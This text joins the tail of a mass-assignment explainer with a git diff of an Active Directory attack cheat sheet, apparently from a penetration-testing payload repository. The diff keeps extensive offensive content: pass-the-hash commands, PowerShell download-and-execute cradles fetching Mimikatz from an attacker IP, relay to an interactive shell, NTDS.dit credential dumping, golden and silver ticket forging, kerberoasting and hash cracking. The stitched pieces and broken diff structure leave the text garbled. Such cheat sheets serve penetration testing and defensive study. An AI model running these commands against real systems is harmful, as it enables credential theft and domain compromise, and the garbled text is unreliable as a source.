 Mass assignment vulnerabilities are most common in web applications that use Object-Relational Mapping (ORM) techniques or functions to map user input to object properties, where properties can be updated all at once instead of individually. Many popular web development frameworks such as Ruby on Rails, Django, and Laravel (PHP) offer this functionality.
 For instance, consider a web application that uses an ORM and has a user object with the attributes `username`, `email`, `password`, and `isAdmin`. In a normal scenario, a user might be able to update their own username, email, and password through a form, which the server then assigns to the user object.
 However, an attacker may attempt to add an `isAdmin` parameter to the incoming data like so:
 ```json
 {
    "username": "attacker",
    "email": "attacker@email.com",
    "password": "unsafe_password",
    "isAdmin": true
 }
 ```
 If the web application is not checking which parameters are allowed to be updated in this way, it might set the `isAdmin` attribute based on the user-supplied input, giving the attacker admin privileges
 ## Labs
 * [PentesterAcademy - Mass Assignment I](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1964)
 * [PentesterAcademy - Mass Assignment II](https://attackdefense.pentesteracademy.com/challengedetailsnoauth?cid=1922)
 ## References
 * [Hunting for Mass Assignment - Shivam Bathla - Aug 12, 2021](https://blog.pentesteracademy.com/hunting-for-mass-assignment-56ed73095eda)
 * [Mass Assignment Cheat Sheet - OWASP](https://cheatsheetseries.owasp.org/cheatsheets/Mass_Assignment_Cheat_Sheet.html)
 * [What is Mass Assignment? Attacks and Security Tips - Yoan MONTOYA - JUNE 15, 2023](https://www.vaadata.com/blog/what-is-mass-assignment-attacks-and-security-tips/)
--- a/Resources/Active
+++ b/Resources/Active
@@ -1,714 +1,51 @@
 # Active Directory Attacks
-## Summary
+:warning: Content of this page has been moved to [InternalAllTheThings/active-directory](https://github.com/swisskyrepo/InternalAllTheThings/)
-
+
-* [Tools](#tools)
+- [Active Directory - Certificate Services](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adcs-certificate-services/)
-* [Most common paths to AD compromise](#most-common-paths-to-ad-compromise)
+- [Active Directory - Access Controls ACL/ACE](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-acl-ace/)
-  * [MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)](#ms14-068-microsoft-kerberos-checksum-validation-vulnerability)
+- [Active Directory - Enumeration](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-enumerate/)
-  * [Open Shares](#open-shares)
+- [Active Directory - Group Policy Objects](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-group-policy-objects/)
-  * [GPO - Pivoting with Local Admin & Passwords in SYSVOL](#gpo---pivoting-with-local-admin--passwords-in-sysvol)
+- [Active Directory - Groups](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-groups/)
-  * [Dumping AD Domain Credentials](#dumping-ad-domain-credentials-systemrootntdsntdsdit)
+- [Active Directory - Linux](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-linux/)
-  * [Password in AD User comment](#password-in-ad-user-comment)
+- [Active Directory - NTDS Dumping](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-ntds-dumping/)
-  * [Golden Tickets](#passtheticket-golden-tickets)
+- [Active Directory - Read Only Domain Controller](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adds-rodc/)
-  * [Silver Tickets](#passtheticket-silver-tickets)
+- [Active Directory - Federation Services](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-adfs-federation-services/)
-  * [Trust Tickets](#trust-tickets)
+- [Active Directory - Integrated DNS - ADIDNS](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-integrated-dns/)
-  * [Kerberoast](#kerberoast)
+- [Roasting - ASREP Roasting](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-asrep/)
-  * [KRB_AS_REP roasting](#krb_as_rep-roasting)
+- [Roasting - Kerberoasting](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-kerberoasting/)
-  * [Pass-the-Hash](#pass-the-hash)
+- [Roasting - Timeroasting](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-roasting-timeroasting/)
-  * [OverPass-the-Hash (pass the key)](#overpass-the-hash-pass-the-key)
+- [Active Directory - Tricks](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/ad-tricks/)
-  * [Capturing and cracking NTLMv2 hashes](#capturing-and-cracking-ntlmv2-hashes)
+- [Deployment - SCCM](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/deployment-sccm/)
-  * [NTLMv2 hashes relaying](#ntlmv2-hashes-relaying)
+- [Deployment - WSUS](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/deployment-wsus/)
-  * [Dangerous Built-in Groups Usage](#dangerous-built-in-groups-usage)
+- [Hash - Capture and Cracking](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-capture/)
-  * [Trust relationship between domains](#trust-relationship-between-domains)
+- [Hash - OverPass-the-Hash](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-over-pass-the-hash/)
-  * [PrivExchange attack](#privexchange-attack)
+- [Hash - Pass-the-Hash](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/hash-pass-the-hash/)
-  * [Password spraying](#password-spraying)
+- [Internal - DCOM](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-dcom/)
-
+- [Internal - MITM and Relay](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-mitm-relay/)
-## Tools
+- [Internal - PXE Boot Image](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-pxe-boot-image/)
-
+- [Internal - Shares](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/internal-shares/)
-* [Impacket](https://github.com/CoreSecurity/impacket) or the [Windows version](https://github.com/maaaaz/impacket-examples-windows)
+- [Kerberos - Bronze Bit](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-bronze-bit/)
-* [Responder](https://github.com/SpiderLabs/Responder)
+- [Kerberos Delegation - Constrained Delegation](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-constrained/)
-* [Mimikatz](https://github.com/gentilkiwi/mimikatz)
+- [Kerberos Delegation - Resource Based Constrained Delegation](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-rbcd/)
-* [Ranger](https://github.com/funkandwagnalls/ranger)
+- [Kerberos Delegation - Unconstrained Delegation](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-delegation-unconstrained/)
-* [BloodHound](https://github.com/BloodHoundAD/BloodHound)
+- [Kerberos - Service for User Extension](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-s4u/)
-
+- [Kerberos - Tickets](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/kerberos-tickets/)
-  ```powershell
+- [Password - AD User Comment](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-comments/)
-  apt install bloodhound #kali
+- [Password - DSRM Credentials](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-dsrm-credentials/)
-  neo4j console
+- [Password - Group Policy Preferences](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-group-policy-preferences/)
-  Go to http://127.0.0.1:7474, use db:bolt://localhost:7687, user:neo4J, pass:neo4j
+- [Password - Pre-Created Computer Account](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-precreated-computer/)
-  ./bloodhound
+- [Password - GMSA](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-read-gmsa/)
-  SharpHound.exe (from resources/Ingestor)
+- [Password - LAPS](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-read-laps/)
-  SharpHound.exe -c all -d active.htb --domaincontroller 10.10.10.100
+- [Password - Shadow Credentials](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-shadow-credentials/)
-  or 
+- [Password - Spraying](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/pwd-spraying/)
-  Invoke-BloodHound -SearchForest -CSVFolder C:\Users\Public
+- [Trust - Privileged Access Management](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-pam/)
-  or 
+- [Trust - Relationship](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-relationship/)
-  bloodhound-python -d lab.local -u rsmith -p Winter2017 -gc LAB2008DC01.lab.local -c all
+- [Child Domain to Forest Compromise - SID Hijacking](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-sid-hijacking/)
-  ```
+- [Forest to Forest Compromise - Trust Ticket](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/trust-ticket/)
-
+- [CVE](#)
-* [AdExplorer](https://docs.microsoft.com/en-us/sysinternals/downloads/adexplorer)
+  - [MS14-068 Checksum Validation](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/MS14-068/)
-* [CrackMapExec](https://github.com/byt3bl33d3r/CrackMapExec)
+  - [NoPAC / samAccountName Spoofing](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/NoPAC/)
-
+  - [PrintNightmare](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/PrintNightmare/)
-  ```bash
+  - [PrivExchange](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/PrivExchange/)
-  git clone --recursive https://github.com/byt3bl33d3r/CrackMapExec
+  - [ZeroLogon](https://swisskyrepo.github.io/InternalAllTheThings/active-directory/CVE/ZeroLogon/)
  crackmapexec smb -L
  crackmapexec smb -M name_module -o VAR=DATA
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable
  crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443
  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload"
  crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" --exec-method smbexec -X 'whoami'
  crackmapexec mimikatz --server http --server-port 80
  ```
 * [Mitm6](https://github.com/fox-it/mitm6.git)
  ```bash
  git clone https://github.com/fox-it/mitm6.git && cd mitm6
  pip install .
  mitm6 -d lab.local
  ntlmrelayx.py -wh 192.168.218.129 -t smb://192.168.218.128/ -i
  # -wh: Server hosting WPAD file (Attacker’s IP)
  # -t: Target (You cannot relay credentials to the same device that you’re spoofing)
  # -i: open an interactive shell
  ```
 * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon)
  ```powershell
  powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.11.0.47/PowerUp.ps1'); Invoke-AllChecks"
  powershell.exe -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.10/Invoke-Mimikatz.ps1');"
  ```
 * [Active Directory Assessment and Privilege Escalation Script](https://github.com/hausec/ADAPE-Script)
    ```powershell
    powershell.exe -ExecutionPolicy Bypass ./ADAPE.ps1 
    ```
 * [Ping Castle](https://github.com/vletoux/pingcastle)
    ```powershell
    pingcastle.exe --healthcheck --server <DOMAIN_CONTROLLER_IP> --user <USERNAME> --password <PASSWORD> --advanced-live --nullsession
    ```
 * [Kerbrute](https://github.com/ropnop/kerbrute)
    ```powershell
    ./kerbrute passwordspray -d <DOMAIN> <USERS.TXT> <PASSWORD>
    ```
 ## Most common paths to AD compromise
 ### MS14-068 (Microsoft Kerberos Checksum Validation Vulnerability)
 This exploit require to know the user SID, you can use `rpcclient` to remotely get it or `wmi` if you have an access on the machine.
 ```powershell
 # remote
 rpcclient $> lookupnames john.smith
 john.smith S-1-5-21-2923581646-3335815371-2872905324-1107 (User: 1)
 # loc
 wmic useraccount get name,sid
 Administrator  S-1-5-21-3415849876-833628785-5197346142-500   
 Guest          S-1-5-21-3415849876-833628785-5197346142-501   
 Administrator  S-1-5-21-297520375-2634728305-5197346142-500   
 Guest          S-1-5-21-297520375-2634728305-5197346142-501   
 krbtgt         S-1-5-21-297520375-2634728305-5197346142-502   
 lambda         S-1-5-21-297520375-2634728305-5197346142-1110 
 ```
 ```bash
 Doc: https://github.com/gentilkiwi/kekeo/wiki/ms14068
 ```
 Generate a ticket with `metasploit` or `pykek`
 ```powershell
 Metasploit: auxiliary/admin/kerberos/ms14_068_kerberos_checksum
   Name      Current Setting                                Required  Description
   ----      ---------------                                --------  -----------
   DOMAIN    LABDOMAIN.LOCAL                                yes       The Domain (upper case) Ex: DEMO.LOCAL
   PASSWORD  P@ssw0rd                                       yes       The Domain User password
   RHOSTS    10.10.10.10                                    yes       The target address range or CIDR identifier
   RPORT     88                                             yes       The target port
   Timeout   10                                             yes       The TCP timeout to establish connection and read data
   USER      lambda                                         yes       The Domain User
   USER_SID  S-1-5-21-297520375-2634728305-5197346142-1106  yes       The Domain User SID, Ex: S-1-5-21-1755879683-3641577184-3486455962-1000
 ```
 ```powershell
 # https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS14-068/pykek
 git clone https://github.com/SecWiki/windows-kernel-exploits
 python ./ms14-068.py -u <userName>@<domainName> -s <userSid> -d <domainControlerAddr> -p <clearPassword>
 python ./ms14-068.py -u darthsidious@lab.adsecurity.org -p TheEmperor99! -s S-1-5-21-1473643419-774954089-2222329127-1110 -d adsdc02.lab.adsecurity.org
 python ./ms14-068.py -u john.smith@pwn3d.local -s S-1-5-21-2923581646-3335815371-2872905324-1107 -d 192.168.115.10
 ```
 Then use `mimikatz` to load the ticket.
 ```powershell
 mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache"
 ```
 :warning: If the clock is skewed use `clock-skew.nse` script from `nmap`
 ```powershell
 $ nmap -sV -sC 10.10.10.10
 clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s
 $ sudo date -s "14 APR 2015 18:25:16" 
 ```
 ### Open Shares
 ```powershell
 smbmap -H 10.10.10.10                # null session
 smbmap -H 10.10.10.10 -R             # recursive listing
 smbmap -H 10.10.10.10 -u invaliduser # guest smb session
 smbmap -H 10.10.10.10 -d active.htb -u SVC_TGS -p GPPstillStandingStrong2k18
 ```
 or 
 ```powershell
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/Share
 pth-smbclient -U "AD/ADMINISTRATOR%aad3b435b51404eeaad3b435b51404ee:2[...]A" //192.168.10.100/C$
 ls  # list files
 cd  # move inside a folder
 get # download files
 put # replace a file
 ```
 or 
 ```powershell
 smbclient -I 10.10.10.100 -L ACTIVE -N -U ""
        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        Replication     Disk      
        SYSVOL          Disk      Logon server share
        Users           Disk
 use Sharename # select a Sharename
 cd Folder     # move inside a folder
 ls            # list files
 ```
 Download a folder recursively
 ```powershell
 smbclient //10.0.0.1/Share
 smb: \> mask ""
 smb: \> recurse ON
 smb: \> prompt OFF
 smb: \> lcd '/path/to/go/'
 smb: \> mget *
 ```
 Mount a share
 ```powershell
 smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw
 ```
 ### GPO - Pivoting with Local Admin & Passwords in SYSVOL
 :triangular_flag_on_post: GPO Priorization : Organization Unit > Domain > Site > Local
 Find password in SYSVOL (MS14-025)
 ```powershell
 findstr /S /I cpassword \\<FQDN>\sysvol\<FQDN>\policies\*.xml
 ```
 Decrypt a Group Policy Password found in SYSVOL (by [0x00C651E0](https://twitter.com/0x00C651E0/status/956362334682849280)), using the 32-byte AES key provided by Microsoft in the [MSDN - 2.2.1.1.4 Password Encryption](https://msdn.microsoft.com/en-us/library/cc422924.aspx)
 ```bash
 echo 'password_in_base64' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 e.g: 
 echo '5OPdEKwZSf7dYAvLOe6RzRDtcvT/wCP8g5RqmAgjSso=' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 echo 'edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ' | base64 -d | openssl enc -d -aes-256-cbc -K 4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b -iv 0000000000000000
 ```
 Metasploit modules to enumerate shares and credentials
 ```c
 scanner/smb/smb_enumshares
 post/windows/gather/enum_shares
 post/windows/gather/credentials/gpp
 ```
 Crackmapexec modules
 ```powershell
 cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_autologin
 cme smb 192.168.1.2 -u Administrator -H 89[...]9d -M gpp_password
 ```
 List all GPO for a domain
 ```powershell
 Get-GPO -domaine DOMAIN.COM -all
 Get-GPOReport -all -reporttype xml --all
 Powersploit:
 Get-NetGPO
 Get-NetGPOGroup
 ```
 ### Dumping AD Domain Credentials (%SystemRoot%\NTDS\Ntds.dit)
 #### Using ndtsutil
 ```powershell
 C:\>ntdsutil
 ntdsutil: activate instance ntds
 ntdsutil: ifm
 ifm: create full c:\pentest
 ifm: quit
 ntdsutil: quit
 ```
 or 
 ```powershell
 ntdsutil "ac i ntds" "ifm" "create full c:\temp" q q
 ```
 #### Using Vshadow
 ```powershell
 vssadmin create shadow /for=C :
 Copy Shadow_Copy_Volume_Name\windows\ntds\ntds.dit c:\ntds.dit
 ```
 You can also use the Nishang script, available at : [https://github.com/samratashok/nishang](https://github.com/samratashok/nishang)
 ```powershell
 Import-Module .\Copy-VSS.ps1
 Copy-VSS
 Copy-VSS -DestinationDir C:\ShadowCopy\
 ```
 #### Using vssadmin
 ```powershell
 vssadmin create shadow /for=C:
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\ShadowCopy
 copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\ShadowCopy
 ```
 #### Using DiskShadow (a Windows signed binary)
 ```powershell
 diskshadow.txt contains :
 set context persistent nowriters
 add volume c: alias someAlias
 create
 expose %someAlias% z:
 exec "cmd.exe" /c copy z:\windows\ntds\ntds.dit c:\exfil\ntds.dit
 delete shadows volume %someAlias%
 reset
 then:
 NOTE - must be executed from C:\Windows\System32
 diskshadow.exe /s  c:\diskshadow.txt
 dir c:\exfil
 reg.exe save hklm\system c:\exfil\system.bak
 ```
 #### Extract hashes from ntds.dit
 then you need to use secretsdump to extract the hashes
 ```java
 secretsdump.py -system /root/SYSTEM -ntds /root/ntds.dit LOCAL
 ```
 secretsdump also works remotely
 ```java
 ./secretsdump.py -dc-ip IP AD\administrator@domain -use-vss
 ./secretsdump.py -hashes aad3b435b51404eeaad3b435b51404ee:0f49aab58dd8fb314e268c4c6a65dfc9 -just-dc PENTESTLAB/dc\$@10.0.0.1
 ```
 #### Alternatives - modules
 Metasploit modules
 ```c
 windows/gather/credentials/domain_hashdump
 ```
 PowerSploit module
 ```powershell
 Invoke-NinjaCopy --path c:\windows\NTDS\ntds.dit --verbose --localdestination c:\ntds.dit
 ```
 CrackMapExec module
 ```powershell
 cme smb 10.10.0.202 -u username -p password --ntds vss
 ```
 ### Password in AD User comment
 ```powershell
 enum4linux | grep -i desc
 There are 3-4 fields that seem to be common in most AD schemas: 
 UserPassword, UnixUserPassword, unicodePwd and msSFU30Password.
 Get-WmiObject -Class Win32_UserAccount -Filter "Domain='COMPANYDOMAIN' AND Disabled='False'" | Select Name, Domain, Status, LocalAccount, AccountType, Lockout, PasswordRequired,PasswordChangeable, Description, SID
 ```
 or dump the Active Directory and `grep` the content.
 ```powershell
 ldapdomaindump -u 'DOMAIN\john' -p MyP@ssW0rd 10.10.10.10 -o ~/Documents/AD_DUMP/
 ```
 ### PassTheTicket Golden Tickets
 Forging a TGT require the krbtgt key
 Mimikatz version
 ```powershell
 Get info - Mimikatz
 lsadump::dcsync /user:krbtgt
 lsadump::lsa /inject /name:krbtgt
 Forge a Golden ticket - Mimikatz
 kerberos::purge
 kerberos::golden /user:evil /domain:pentestlab.local /sid:S-1-5-21-3737340914-2019594255-2413685307 /krbtgt:d125e4f69c851529045ec95ca80fa37e /ticket:evil.tck /ptt
 kerberos::tgt
 ```
 Meterpreter version
 ```powershell
 Get info - Meterpreter(kiwi)
 dcsync_ntlm krbtgt
 dcsync krbtgt
 Forge a Golden ticket - Meterpreter
 load kiwi
 golden_ticket_create -d <domainname> -k <nthashof krbtgt> -s <SID without le RID> -u <user_for_the_ticket> -t <location_to_store_tck>
 golden_ticket_create -d pentestlab.local -u pentestlabuser -s S-1-5-21-3737340914-2019594255-2413685307 -k d125e4f69c851529045ec95ca80fa37e -t /root/Downloads/pentestlabuser.tck
 kerberos_ticket_purge
 kerberos_ticket_use /root/Downloads/pentestlabuser.tck
 kerberos_ticket_list
 ```
 Using a ticket on Linux
 ```powershell
 Convert the ticket kirbi to ccache with kekeo
 misc::convert ccache ticket.kirbi
 Alternatively you can use ticketer from Impacket
 ./ticketer.py -nthash a577fcf16cfef780a2ceb343ec39a0d9 -domain-sid S-1-5-21-2972629792-1506071460-1188933728 -domain amity.local mbrody-da
 ticketer.py -nthash HASHKRBTGT -domain-sid SID_DOMAIN_A -domain DEV Administrator -extra-sid SID_DOMAIN_B_ENTERPRISE_519
 ./ticketer.py -nthash e65b41757ea496c2c60e82c05ba8b373 -domain-sid S-1-5-21-354401377-2576014548-1758765946 -domain DEV Administrator -extra-sid S-1-5-21-2992845451-2057077057-2526624608-519
 export KRB5CCNAME=/home/user/ticket.ccache
 cat $KRB5CCNAME
 NOTE: You may need to comment the proxy_dns setting in the proxychains configuration file
 ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
 ```
 ### PassTheTicket Silver Tickets
 Forging a TGS require machine accound password (key) from the KDC
 ```powershell
 Create a ticket for the service
 kerberos::golden /user:USERNAME /domain:DOMAIN.FQDN /sid:DOMAIN-SID /target:TARGET-HOST.DOMAIN.FQDN /rc4:TARGET-MACHINE-NT-HASH /service:SERVICE
 /kerberos::golden /domain:adsec.local /user:ANY /sid:S-1-5-21-1423455951-1752654185-1824483205 /rc4:ceaxxxxxxxxxxxxxxxxxxxxxxxxxxxxx /target:DESKTOP-01.adsec.local /service:cifs /ptt
 Then use the same steps as a Golden ticket
 misc::convert ccache ticket.kirbi
 export KRB5CCNAME=/home/user/ticket.ccache
 ./psexec.py -k -no-pass -dc-ip 192.168.1.1 AD/administrator@192.168.1.100 
 ```
 ### Trust Tickets
 TODO
 ### Kerberoast
 > "A service principal name (SPN) is a unique identifier of a service instance. SPNs are used by Kerberos authentication to associate a service instance with a service logon account. " - [MSDN](https://docs.microsoft.com/fr-fr/windows/desktop/AD/service-principal-names)
 Any valid domain user can request a kerberos ticket for any domain service with `GetUserSPNs`. Once the ticket is received, password cracking can be done offline on the ticket to attempt to break the password for whatever user the service is running as.
 ```powershell
 $ GetUserSPNs.py active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request
 Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
 ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet      LastLogon           
 --------------------  -------------  --------------------------------------------------------  -------------------  -------------------
 active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 21:06:40  2018-12-03 17:11:11 
 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$424338c0a3c3af43c360c29c154b012c$c54c7be163ae6c323ae6b5fc45a1eacee2f4903deec785cd689f4551e023775c7e7772fe85e3fb8374ca95534d72c971ba80e8b6d4ef3c3b8439dc54031540133cbcbd5f7b39d622733d198eec594c0cd181ab4696a6ad12744d1ddd2d3e2c6dd33b4daedbc9cae75e8ff2652c80421b0fa3a61ddf2cabeea462c44e0f6d9a6436717e0621bb4e0fe8bd3cf36156b4b2f7b81d651f70baf34a0b3071858b5034b895c25a0d3c67044c849d5952c381a0078a86ae562810a93d9c7bcc8311255cc9eda35a9c4d4d43ff1cc29108056285c954f3c633332ff0cb0c9c0f1896c792b247c8d25f5dd71802728fc99bb22709337b5596ab0e2045110b0b005b03351e9f71a65b48e8259f6191ce95d4e5794846c61c3abccf0f5f72a8679fb0dc0777720f5551ad99c9c9ab0955f85ee211d40b01fcaece7868960b2063923aa0f59e17b347f3308087707e95cad54b9df8179728821cf54cb204c5c2e571d9a66c8ec40b090305aa32e90a90d25ea37be6d8f8a83c683a8b69d386f9edb970596bc56fa02971f69c7e073b8de1213d9caa75ab652e5c5b99cadace9dd7d15d1d530309ea39ca1b7c6009ae3342796a6bdea084622ee95cbade437659e37363b848bad2186e3a9f7dec66e1e496db32d55eda8fb926f057996638646dcc662ed226788ddf36304dc70eaca91b26cb7180341f417fad91117ee10212c69423abd42769cbf891b51d736ffe474899eec8df64abef319d3c6dc379f2bfda33de7c3a1a50d6ece564d4559c77f560b7506fa2f1c9af7162f1247ea35706aafffde48b8cc48b1ec8e99d99ac81dc02f55f43f9726d746383cd076e7199070ff8100846ba9dc2235e92d0c7dac1f33da5fe7901e02f0566030d7c7e02535d6a300292a04e6c32d0d74d37679c2617750f5920d9c697a30c883519bc6b5a916eec354459c7f248c783bd79c436a7e8c463a8981a9e000d21c2d00c7e8468cff0ab695cb3aa4f14f149d1fafb4d656bcd1f67b747fc4c2d648466a386774853db8d50c22df57e747085142f98f5f06191c243b9dbf671da64228364f058c7e2e53a80fdde7f6dc2f25459a09fb2583757953247c222d64f49bc12d461d2e5aa572ceba2605d7eafd6031405ee422ac35cbf041b4fd28e58d871406e053d1a806de49056791646c175bf0d2aaa19f844bfc885520e19c391702be6ae61122fceac32b689764334908a4eaf7c69974a9519ebb068a15c087955fb402416bd184fd2
 ```
 Alternatively with [Rubeus](https://github.com/GhostPack/Rubeus)
 ```powershell
 .\rubeus.exe kerberoast /creduser:DOMAIN\JOHN /credpassword:MyP@ssW0RD
 ```
 Then crack the ticket with hashcat or john
 ```powershell
 hashcat -m 13100 -a 0 hash.txt crackstation.txt
 ./john ~/hash.txt --wordlist=rockyou.lst
 ```
 ### KRB_AS_REP Roasting
 If a domain user does not have Kerberos preauthentication enabled, an AS-REP can be successfully requested for the user, and a component of the structure can be cracked offline a la kerberoasting
 ```powershell
 C:\>git clone https://github.com/GhostPack/Rubeus#asreproast
 C:\Rubeus>Rubeus.exe asreproast /user:TestOU3user
 ______        _
 (_____ \      | |
 _____) )_   _| |__  _____ _   _  ___
 |  __  /| | | |  _ \| ___ | | | |/___)
 | |  \ \| |_| | |_) ) ____| |_| |___ |
 |_|   |_|____/|____/|_____)____/(___/
 v1.3.4
 [*] Action: AS-REP roasting
 [*] Target User            : TestOU3user
 [*] Target Domain          : testlab.local
 [*] SamAccountName         : TestOU3user
 [*] DistinguishedName      : CN=TestOU3user,OU=TestOU3,OU=TestOU2,OU=TestOU1,DC=testlab,DC=local
 [*] Using domain controller: testlab.local (192.168.52.100)
 [*] Building AS-REQ (w/o preauth) for: 'testlab.local\TestOU3user'
 [*] Connecting to 192.168.52.100:88
 [*] Sent 169 bytes
 [*] Received 1437 bytes
 [+] AS-REQ w/o preauth successful!
 [*] AS-REP hash:
    $krb5asrep$TestOU3user@testlab.local:858B6F645D9F9B57210292E5711E0...(snip)...
 ```
 ### Pass-the-Hash
 The types of hashes you can use with Pass-The-Hash are NT or NTLM hashes.
 ```powershell
 use exploit/windows/smb/psexec
 set RHOST 10.2.0.3
 set SMBUser jarrieta
 set SMBPass nastyCutt3r  
 # NOTE1: The password can be replaced by a hash to execute a `pass the hash` attack.
 # NOTE2: Require the full NTLM hash, you may need to add the "blank" LM (aad3b435b51404eeaad3b435b51404ee)
 set PAYLOAD windows/meterpreter/bind_tcp
 run
 shell
 or with crackmapexec
 cme smb 10.2.0.2 -u jarrieta -H 'aad3b435b51404eeaad3b435b51404ee:489a04c09a5debbc9b975356693e179d' -x "whoami"
 also works with net range : cme smb 10.2.0.2/24 ... 
 or with psexec
 proxychains python ./psexec.py jarrieta@10.2.0.2 -hashes :489a04c09a5debbc9b975356693e179d
 or with the builtin Windows RDP and mimikatz
 sekurlsa::pth /user:<user name> /domain:<domain name> /ntlm:<the user's ntlm hash> /run:"mstsc.exe /restrictedadmin"
 ```
 ### OverPass-the-Hash (pass the key)
 Request a TGT with only the NT hash
 ```powershell
 Using impacket
 ./getTGT.py -hashes :1a59bd44fe5bec39c44c8cd3524dee lab.ropnop.com
 chmod 600 tgwynn.ccache
 also with the AES Key if you have it
 ./getTGT.py -aesKey xxxxxxxxxxxxxxkeyaesxxxxxxxxxxxxxxxx lab.ropnop.com
 ktutil -k ~/mykeys add -p tgwynn@LAB.ROPNOP.COM -e arcfour-hma-md5 -w 1a59bd44fe5bec39c44c8cd3524dee --hex -V 5
 kinit -t ~/mykers tgwynn@LAB.ROPNOP.COM
 klist
 ```
 ### Capturing and cracking NTLMv2 hashes
 If any user in the network tries to access a machine and mistype the IP or the name, Responder will answer for it and ask for the NTLMv2 hash to access the resource. Responder will poison `LLMNR`, `MDNS` and `NETBIOS` requests on the network.
 ```python
 python Responder.py -I eth0
 ```
 Then crack the hash with `hashcat`
 ```powershell
 hashcat -m 5600 -a 0 hash.txt crackstation.txt
 ```
 ### NTLMv2 hashes relaying
